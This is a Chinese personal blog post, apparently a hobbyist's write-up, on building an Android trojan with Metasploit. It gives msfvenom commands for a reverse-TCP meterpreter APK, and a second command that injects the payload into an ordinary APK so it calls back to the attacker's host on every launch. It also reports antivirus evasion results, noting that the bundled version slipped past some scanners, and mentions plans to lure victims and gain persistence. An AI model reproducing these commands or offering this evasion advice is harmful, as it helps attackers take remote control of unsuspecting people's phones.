0%

msf反弹Android_Shell

 msf的功能属实强大, 我以为弹Android的shell会和弹pc的shell差别很大, 没想到就改个参数的事情. 越来越觉得以前玩msf是在拿步枪当烧火棍用.

生成安装文件

 安卓端的可执行文件都要通过安装的过程才能部署到手机上, 也就是说这次msfvenom生成的不再是可执行文件, 而是安装包了. 所用的命令和之前干pc的时候一样, 无非就是换个payload.

1
msfvenom -p android/meterpreter/reverse_tcp lhost=base.sern.siteYOUR_HOST lport=YOUR_PORT -o test.apk

 这样生成出来的就是完整的安卓安装包, 把这个安到手机上, 每次运行应用的时候就会往host反弹一个tcp的shell.

免杀?

 遗憾的是我不知道应该怎么免杀安卓安装包了, 之前的科技树从来没有点到过这里… 不过我抱着死🐎当活🐎用的心态上传了没有混淆过的原版安装包, 杀软的反应比我想象的要好不少:

 五个报毒, 但这可是啥伪装都没搞的原生🐎啊, 没报毒的杀软可以拿去当桌面宠物用了.
 不过这个状态的🐎还是会被火绒gank, 而且没有界面, 安装完后就是个默认的安卓机器人图标的应用, 拿出去钓的话大概率会直接被强一点的杀软按死, 或者被鱼卸掉. 顺便一说, 我暂时还没找到持久化控制的方法. 对标pc平台上持久控制的标准, 怎么也得卸载应用后还能定时弹shell回来.

更进一步

 虽然我还没学会安卓开发, 不过还是有办法给我们的🐎一个界面的. 我们可以考虑把payload插入到其他正常的apk应用中. 给应用以🐎, 而不是给🐎以应用.
 所幸msf的自动生成部分做的相当完善, 我们只需要在msfvenom的参数中多加一个-x raw.apk 就可以把payload添加到raw.apk中去. 安装完成后不会对原应用功能产生任何影响, 只会在应用启动的时候想host这边反弹一个小小的shell.

1
msfvenom -p android/meterpreter/reverse_tcp lhost=base.sern.siteYOUR_HOST lport=YOUR_PORT -x raw.apk -o test.apk

意外收获

 我本来以为添加捆绑破坏apk签名这事会大幅提高被杀率, 结果emmmmm 竟然过火绒了擦!

报毒的杀软也从五个降低到了三个…

顺便附上群友以身犯险拿qq手机安全管家测试安装的结果

 加了个捆绑效果就这么好, 真的是处处有惊喜啊. 不过有一说一, 华为是真的顶, 竟然扛住了 ( 虽然是应该的 ). 后续还得接着学习一个安卓应用的混淆.

总结

 两个小时就弹回来了一个安卓的🐎, 还过了一大批杀软… msf属实牛逼好吧. 回来安排着看看怎么混淆apk, 似乎会比混淆二进制代码简单点吧.
 以后再装应用务必找靠谱的渠道装.